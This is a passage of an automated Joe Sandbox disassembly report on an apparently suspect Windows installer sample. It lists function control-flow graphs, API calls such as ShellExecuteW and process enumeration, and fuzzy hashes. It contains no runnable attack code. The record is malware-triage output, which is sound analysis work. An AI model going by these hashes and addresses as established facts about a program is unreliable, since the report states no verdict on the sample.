                    • Instruction ID: e1576bc29d89e2789c90d7360848647e5e88d3aa3db4fc6b5d334060f6266443
                    • Opcode Fuzzy Hash: 28d58af51618036718c252708d6da1339e8b50d3138fddc83e0f4718e70968a2
                    • Instruction Fuzzy Hash: FE01863250061197EB15EBA49A59B7F7274EB80758F21413FE402BB1E1C67C8D81865D

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 471 40139b-4013a0 472 40140c-40140e 471->472 473 401410 472->473 474 4013a2-4013b2 472->474 475 401412-401413 473->475 474->473 476 4013b4-4013b5 call 40159c 474->476 478 4013ba-4013bf 476->478 479 4013c1-4013c9 call 40137c 478->479 480 401416-40141b 478->480 483 4013cb-4013cd 479->483 484 4013cf-4013d4 479->484 480->475 485 4013d6-4013db 483->485 484->485 485->472 486 4013dd-401406 MulDiv SendMessageW 485->486 486->472
                    APIs
                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 7d139e0d7de234bcf6a700e513e47626535988416de2a1309b9d7b071a3250d9
                    • Instruction ID: d821e5382ecf7e63f516690336e344d0ace40c90d4042eade43e4a0886427dd5
                    • Opcode Fuzzy Hash: 7d139e0d7de234bcf6a700e513e47626535988416de2a1309b9d7b071a3250d9
                    • Instruction Fuzzy Hash: 2801FF31A202209BEB155F35AC08B6B3698A784315F20427EF855F72F2D678CC829B8C

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 487 4058fe-40592a GetFileAttributesW CreateFileW
                    APIs
                    • GetFileAttributesW.KERNELBASE(00000003,0040315B,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00405902
                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004035D7,?), ref: 00405924
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: File$AttributesCreate
                    • String ID:
                    • API String ID: 415043291-0
                    • Opcode ID: 0a2f85832d22be582635bab1499ab015b7246acefa136c2a8fff2ea0c335f580
                    • Instruction ID: 3557cad305de1e8d8744f7ed922a0974add56b4630c1d6058af0572804785a4b
                    • Opcode Fuzzy Hash: 0a2f85832d22be582635bab1499ab015b7246acefa136c2a8fff2ea0c335f580
                    • Instruction Fuzzy Hash: 0AD09E71654201EFEF099F20DE1AF6EBBA2EB84B01F11852CB692940E0DAB15819DB15

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 488 4058de-4058eb GetFileAttributesW 489 4058fb 488->489 490 4058ed-4058f5 SetFileAttributesW 488->490 490->489
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,00406701,?,?,?), ref: 004058E2
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 004058F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                    • Instruction ID: 9bfeacdea6eb5f2932ef974784812b51c4f8f2d5e5736dd59436ec15d4266534
                    • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                    • Instruction Fuzzy Hash: 8DC01272404900AAC6001B34DF0881A7B22AB94331B258739B5BAE00F0CB3088A9AA18

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 491 401f9b-401ff3 call 40145c * 4 call 401435 ShellExecuteW 502 402c58-402c67 491->502 503 401ff9 491->503 503->502
                    APIs
                    • ShellExecuteW.SHELL32(?,00000000,?,00000000,004D40B0,00000000), ref: 00401FEA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: ExecuteShell
                    • String ID:
                    • API String ID: 587946157-0
                    • Opcode ID: 472f4eeaf3e5161a1656fb81187af857e571e343c78cb304711e9bc17c207397
                    • Instruction ID: 63966a6383d29ffdfa22f329224652c183dd70f9b2d60f481563a5b1fdafd2c8
                    • Opcode Fuzzy Hash: 472f4eeaf3e5161a1656fb81187af857e571e343c78cb304711e9bc17c207397
                    • Instruction Fuzzy Hash: 6DF06232650224A6DB10BBB9DC86BAD37E89B44758F208537F601EA0E2D67CC8C18248
                    APIs
                    • RegOpenKeyExW.KERNELBASE(?,00000000,00000000,?,?), ref: 00401587
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 5e993feb771b5cf26465967f746d5e6f11a2072fdff488fd80c6cb0f440dea5c
                    • Instruction ID: 25f660db1a1e8629dce7ab52a77c94397c675d14e237935d7f32c5267cf96d12
                    • Opcode Fuzzy Hash: 5e993feb771b5cf26465967f746d5e6f11a2072fdff488fd80c6cb0f440dea5c
                    • Instruction Fuzzy Hash: E8F0377A250109BBD700DB59DD41FE637DCE744B94F148036FA09DB151C735E44187A9
                    APIs
                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,?,?), ref: 004018A4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: PathSearch
                    • String ID:
                    • API String ID: 2203818243-0
                    • Opcode ID: 223388b599ff242e7ccadcd08180d40b3faf74b659585ba66a24a54107b5256e
                    • Instruction ID: 00f5228fbcba69d7f7f389f47c449123412ef94834c0b690fd6e23632fde5db3
                    • Opcode Fuzzy Hash: 223388b599ff242e7ccadcd08180d40b3faf74b659585ba66a24a54107b5256e
                    • Instruction Fuzzy Hash: ABE04F32304255AAF340DBA4DD49B9E73A4DB40728F20423AEA15F60D1E3B49A84C769
                    APIs
                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F3A,000000FF,00000004,00000000,00000000,00000000), ref: 00402EB5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 6eb761298bb8b99514d02d989ea50b9b43b036f115663e871731ccf59cb5bf7b
                    • Instruction ID: bd695a607233752ff1959b473a7ca1503adc94cd5dff5db9087338bb7c64902f
                    • Opcode Fuzzy Hash: 6eb761298bb8b99514d02d989ea50b9b43b036f115663e871731ccf59cb5bf7b
                    • Instruction Fuzzy Hash: F0E08C322A0218BBCB219E91DE08AE73B5CEB047A2F008436B958E51D0D674D952DBF9
                    APIs
                      • Part of subcall function 00405AE7: CharNextW.USER32(?,*?|<>/":,00000000,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B4A
                      • Part of subcall function 00405AE7: CharNextW.USER32(?,?,?,00000000), ref: 00405B59
                      • Part of subcall function 00405AE7: CharNextW.USER32(?,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B5E
                      • Part of subcall function 00405AE7: CharPrevW.USER32(?,?,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B72
                    • CreateDirectoryW.KERNELBASE(004E00C8,00000000,004E00C8,004E00C8,004E00C8,00000002,0040359B), ref: 00403381
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Char$Next$CreateDirectoryPrev
                    • String ID:
                    • API String ID: 4115351271-0
                    • Opcode ID: c9f98378969a177fcb370052af8fd256873b8aecdbe0e59b9a239e0623e805da
                    • Instruction ID: d79b23296e172e3f7541ee3cb439833c7f4a864136be478e135bd67e808ea9fb
                    • Opcode Fuzzy Hash: c9f98378969a177fcb370052af8fd256873b8aecdbe0e59b9a239e0623e805da
                    • Instruction Fuzzy Hash: 54D09E11547D7561C56236663E46FDF151C8F52359F114077F540B51C25A6C0A8289ED
                    APIs
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032EE,?,?,?,?,00000000,004035D7,?), ref: 00402EDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: 052875b64ac29a69a56fe5fa30ce1250d27c90eff136e832dd86e8876edcd7ee
                    • Instruction ID: 4946e7aaa73dbe9c50503acfc76fe66090dc5a246f76b590ec387925aa062f70
                    • Opcode Fuzzy Hash: 052875b64ac29a69a56fe5fa30ce1250d27c90eff136e832dd86e8876edcd7ee
                    • Instruction Fuzzy Hash: 4EB09231140300AADA215F009E09F057B21AB90700F108824B291281F086712020EA0D
                    APIs
                    • Sleep.KERNELBASE(00000000), ref: 00401656
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 8dc5173ed66c8cb9375c8a62a6b21d0958b4d16d400b23e9b38b04bf0691659c
                    • Instruction ID: b7a5ace7ee108f6bfae9467569b9736203130378aa17b3a4f183cff96938e45a
                    • Opcode Fuzzy Hash: 8dc5173ed66c8cb9375c8a62a6b21d0958b4d16d400b23e9b38b04bf0691659c
                    • Instruction Fuzzy Hash: 42D02233704200CBE700F7B8AE8942E33A4E71232D3200C3BD803F20A0D639C8C1822D
                    APIs
                    • CloseHandle.KERNELBASE(FFFFFFFF,00403659,?), ref: 004033F6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CloseHandle
                    • String ID:
                    • API String ID: 2962429428-0
                    • Opcode ID: b15d56c08097fff20514f368db00eea90c541c95b920032091ed5aa6df719ccb
                    • Instruction ID: 11a803593133d0a8bb5f97cf02fa30ccca2668fa513f91d2e48bc3b8907970a3
                    • Opcode Fuzzy Hash: b15d56c08097fff20514f368db00eea90c541c95b920032091ed5aa6df719ccb
                    • Instruction Fuzzy Hash: 0EC0123060034096D1617F79AD0E7043E556780335BA04B39F0F6B00F1C77C4665552E
                    APIs
                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 00405C83
                    • lstrlenW.KERNEL32(?), ref: 00405C90
                    • GetVersionExW.KERNEL32(?), ref: 00405CEE
                      • Part of subcall function 00405ADA: CharUpperW.USER32(?,00405CC5,?), ref: 00405AE0
                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00405D2D
                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00405D4C
                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00405D56
                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00405D61
                    • FreeLibrary.KERNEL32(00000000), ref: 00405D98
                    • GlobalFree.KERNEL32(?), ref: 00405DA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                    • API String ID: 20674999-2124804629
                    • Opcode ID: bfd5aff29ee4f1ffb6214c97bb0594a6be1cab25f0f6d26799202fd0c5d98f81
                    • Instruction ID: 5cd628679c3206996b44c0f0d1c9f7c2e320434dbef64c8d82388663d9783bcf
                    • Opcode Fuzzy Hash: bfd5aff29ee4f1ffb6214c97bb0594a6be1cab25f0f6d26799202fd0c5d98f81
                    • Instruction Fuzzy Hash: A091407190061AEBDF109FA4CD88AAFBBB8EF44741F10407AE545F6190DB788A45CF69
                    APIs
                    • GetDlgItem.USER32(?,000003F9), ref: 00404494
                    • GetDlgItem.USER32(?,00000408), ref: 004044A1
                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004044F0
                    • LoadBitmapW.USER32(0000006E), ref: 00404503
                    • SetWindowLongW.USER32(?,000000FC,Function_000043CD), ref: 0040451D
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040452F
                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404543
                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404559
                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404565
                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404575
                    • DeleteObject.GDI32(?), ref: 0040457A
                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004045A5
                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004045B1
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404652
                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404675
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404686
                    • GetWindowLongW.USER32(?,000000F0), ref: 004046B0
                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004046BF
                    • ShowWindow.USER32(?,00000005), ref: 004046D0
                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 004047CE
                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404829
                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040483E
                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404862
                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404888
                    • ImageList_Destroy.COMCTL32(?), ref: 0040489D
                    • GlobalFree.KERNEL32(?), ref: 004048AD
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040491D
                    • SendMessageW.USER32(?,00001102,?,?), ref: 004049CB
                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004049DA
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004049FA
                    • ShowWindow.USER32(?,00000000), ref: 00404A4A
                    • GetDlgItem.USER32(?,000003FE), ref: 00404A55
                    • ShowWindow.USER32(00000000), ref: 00404A5C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                    • String ID: $ @$M$N
                    • API String ID: 1638840714-3479655940
                    • Opcode ID: 937356102a75185e20c66d4cdea0a1291c72136f879f0bdf363495dfedd26f78
                    • Instruction ID: b4b482d55b4410d1430187b36ccef83e55c8bda0955db637de4799104be70721
                    • Opcode Fuzzy Hash: 937356102a75185e20c66d4cdea0a1291c72136f879f0bdf363495dfedd26f78
                    • Instruction Fuzzy Hash: 5F027BB0900209EFDB119FA4CD45AAEBBB5FB84315F10813AF614B62E0D7799E91CF58
                    APIs
                    • GetDlgItem.USER32(?,00000403), ref: 00404C16
